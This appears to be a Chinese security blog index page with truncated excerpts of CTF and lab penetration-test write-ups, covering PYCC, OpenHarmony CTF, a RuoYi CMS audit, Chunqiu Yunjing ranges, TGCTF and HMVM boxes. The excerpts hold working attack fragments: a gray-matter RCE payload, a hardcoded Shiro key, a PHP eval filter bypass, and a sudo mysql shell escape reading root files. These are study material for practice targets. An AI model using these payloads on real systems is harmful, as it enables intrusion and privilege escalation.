2025PYCC
半决赛回归基本功
“金铲铲”最强王者选手小睿来到了新赛季“赛博之城”,面对全新的版本,他试图重回最强王者段位,但却总是屡屡失败,他不由感叹:“归根到底还是基本功不够扎实,回归基本功,从代码中找到上分密码flag吧!”
题目中有提示
(注意:需要输入正确的“用户代理”身份标识与英雄名称)
(例如选择“鳄霸雷克顿”,需要输入对应的拼音全称,首字母大写,即“EBaLeiKeDun”)
( “EBaLeiKeDun”(鳄霸雷克顿)与“ShengLingShiZheLeiKeDun”(圣灵使者雷克顿)是不同的答案 )
修改UA头找到下一关内容
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647<?phpshow_source(__FILE__);include('E8sP4g7UvT.php');$a=$_GET['huigui_jibengong.1'];$b=$_GET['huigui_jibengong.2& ...
OpenHarmony_CTF专题赛
两天三道web也算是有惊无险
Filesystem
这是一个开发了不到百分之十的文件管理系统tips:赛题服务环境启动较慢,请耐心等待2分钟左右再访问赛题,若长时间没有服务请尝试重启
审计代码最开始发现的就是admin.controller.ts中使用了gray-matter库来处理用户的slogon
经过测试可以直接RCE
123456789// import * as gray from "gray-matter"const gray = require('gray-matter');var payload = '---js\n((require("child_process")).execSync("whoami > RCE.txt"))\n---RCE';var username = 'admin';const profile = gray.stringify(gray(payload).content, {username: usern ...
若依CMS-4.5.1代码审计
前期准备源码
Releases · yangzongzhuan/RuoYi
导入sql文件
修改配置文件src/main/resources/application-druid.yml
Shiro反序列化pom.xml中发现引入了Shiro组件
全局搜索cipherKey在src/main/resources/application.yml找到硬编码了密钥信息
1zSyK5Kp6PZAAjlT+eeNMlg==
发现login逻辑中有一个Boolean参数rememberMe
抓包验证
查看subject.login跳转到jetbrains://idea/navigate/reference?project=RuoYi-4.5.1&path=~\.m2\repository\org\apache\shiro\shiro-core\1.7.0\shiro-core-1.7.0.jar!\org\apache\shiro\subject\Subject.class
说明已经来到了Shiro对应的Jar包中,用的Shiro进行的鉴权
在知道Shiro加密密钥和 ...
春秋云镜-Privilege
在这个靶场中,您将扮演一名资深黑客,被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用,并通过后渗透技巧深入 XR Shop 的内部网络,寻找潜在的弱点和漏洞,并通过滥用 Windows 特权获取管理员权限,最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag,分布于不同的靶机。
第一关
请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
fscan起手
123456789101112131415161718192021222324252627282930313233343536373839404142E:\小工具\fscan>fscan -h 39.99.134.90┌──────────────────────────────────────────────┐│ ___ ...
春秋云镜-Spoofing
Spoofing是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
flag1 入口 Tomcat-172.22.11.76扫到8080端口
目录扫描
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch>python dirsearch.py -u http://39.98.127.157:8080/ _|. _ _ _ _ _ _|_ v0.4.3 by 鹏组安全 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | ...
春秋云镜-Hospital
描述:在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个 flag,分布于不同的靶机。
标签:内网渗透、Nacos、Shiro、Fastjson、Decrypt
难度:简单
内网地址
Host or FQDN
简要描述
172.30.12.5
Web01
Spring + Shiro
172.30.12.6
Server02
Nacos
172.30.12.236 172.30.54.179
Web03
Fastjson
172.30.54.12
Web04
Grafana + Postgresql
flag1 入口-172.30.12.5fscan起手
1http://39.99.147.102/actuator/heapdump
下载到heapdump文件
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...
春秋云镜-Initial
信息搜集
thinkphp 5.0.23 RCE检测一下
写马
反弹shell
得到第一半flag
123456789101112131415www-data@ubuntu-web01:/$ sudo mysql -e '\! cat /root/flag/f*'sudo mysql -e '\! cat /root/flag/f*' ██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████ ░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██ ░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░ ░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ...
TGCTF_web
AAA偷渡阴平
web签到1。简单的PHP特性,我的waf无懈可击!(bushi
1234567891011121314<?php$tgctf2025=$_GET['tgctf2025'];if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $tgctf2025)){ //hint:你可以对着键盘一个一个看,然后在没过滤的符号上用记号笔画一下(bushi eval($tgctf2025);}else{ die('(╯‵□′)╯炸弹!•••*~●');}highlight_file(__FILE__);
考虑无参
?tgctf2025=eval(current(getallheaders()));
或者
...
HMVM-SingDanceRap
端口扫描
目录扫描12345678910111213141516171819202122232425262728293031323334┌──(root㉿kali)-[~/yiyi/vshell_4.9.3/v_linux_amd64]└─# feroxbuster -u http://192.168.56.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --extensions php,html,js,txt ...
HMVM-Todd
12345678910┌──(root㉿kali)-[~]└─# arp-scan -I eth2 -l Interface: eth2, type: EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.168.56.1 0a:00:27:00:00:15 (Unknown: locally administered)192.168.56.100 08:00:27:86:23:49 PCS Systemtechnik GmbH192.168.56.120 08:00:27:28:80:f3 PCS Systemtechnik GmbH3 packets received by filter, 0 packets dropped by kernelEnding arp-scan 1.10.0: 256 hosts sc ...